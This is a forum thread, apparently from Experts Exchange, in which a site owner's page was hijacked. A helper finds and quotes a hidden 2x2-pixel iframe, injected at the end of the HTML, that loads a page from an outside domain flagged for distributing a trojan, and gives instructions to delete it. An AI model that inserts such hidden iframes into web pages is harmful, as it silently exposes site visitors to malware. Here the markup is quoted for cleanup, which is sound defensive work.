Solved

Hijacked site

Posted on 2013-01-17
9
463 Views
Last Modified: 2013-12-06
I am trying to sort out another issue on the following site, however since I've posted the question and link to in on Expert Exchange, it seems that the site has been hijcked and is re-directing to another site. The site in question is:

http://www.neuproessentials.co.uk

this is what a previous expert had to say ID: 38790188

Used a hack / slave AV machive and get redirected to:
http://macskako.com/hmod.html giving :

Forbidden
You don't have permission to access /hmod.html on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

Open in new window

                                           
Any help on how to correct this would be greatly appreciated.

Thanks
0
Comment
Question by:smythers
9 Comments
 
LVL 1

Expert Comment

by:SirLagz
ID: 38792295
That site is working for me at the moment.
Going to a Neupro patches site ?
0
 

Author Comment

by:smythers
ID: 38792368
Yes, that's what it's meant to be doing but the experts who were trying to click on the link yesterday were getting redirected to some strange site and suggested I get it sorted here first.. Thanks for taking a look

I don't suppose you would be able to tell my why the video on this page will not work in IE 6, 7 or 8? That is my real problem.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794281
I'm getting redirected to:
http://macskako.com/hmod.html
in Google Chrome but not in IE8.

Forbidden
You don't have permission to access /hmod.html on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

This comment is at 19:00 GMT, just as a reference.

Right at the end of your http://www.neuproessentials.co.uk after the tracking script you have this:

<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>

Open in new window


Did you place that there?
0
Announcing the Most Valuable Experts of 2016

MVEs are more concerned with the satisfaction of those they help than with the considerable points they can earn. They are the types of people you feel privileged to call colleagues. Join us in honoring this amazing group of Experts.

 
LVL 38

Expert Comment

by:BillDL
ID: 38794287
Now it loads the correct page in Chrome 2nd time around.

By the way, the domain macskako.com is registered in Budapast, Hungary.
http://www.dnsstuff.com/tools#whois/type=domain&&value=macskako.com&&
0
 
LVL 38

Accepted Solution

by:
BillDL earned 500 total points
ID: 38795825
Some Info:

http://evuln.com/tools/malware-scanner/www.neuproessentials.co.uk/

http://evuln.com/tools/malware-scanner/macskako.com/


Safe Browsing Diagnostic page for neuproessentials.co.uk valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=neuproessentials.co.uk/

What is the current listing status for neuproessentials.co.uk?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Google has not visited this site within the past 90 days.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, neuproessentials.co.uk did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

Safe Browsing Diagnostic page for macskako.com  valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=macskako.com/

What is the current listing status for macskako.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-11-17, and the last time suspicious content was found on this site was on 2012-11-17.
Malicious software includes 1 trojan(s).

This site was hosted on 1 network(s) including AS12301 (INVITEL).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, macskako.com appeared to function as an intermediary for the infection of 8 site(s) including showyai.com, techinspecialed.com, geocaching.com.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Search all your website's pages for this tag:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe>

Open in new window

and delete from <iframe> through to and including </iframe> for each instance.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 39345902
Thanks younghv
0
 
LVL 38

Expert Comment

by:younghv
ID: 39346032
Hey BillDL -
Glad to help.
I've been on hiatus for several months, but will endeavor (endeavour) to keep these caught up better.
Vic
0

Featured Post

Free Tool: Subnet Calculator

The subnet calculator helps you design networks by taking an IP address and network mask and returning information such as network, broadcast address, and host range.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

UPDATE - 6/15/2011 Added support for Release Update 6 Maintenance Patch 2 Point Patch 1 (RU6 MP2 PP1). Fixed a defect in the username field that was hard-coded to look for a specific domain (left over code from testing). This release will be the …
You cannot be 100% sure that you can protect your organization against crypto ransomware but you can lower down the risk and impact of the infection.
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

856 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question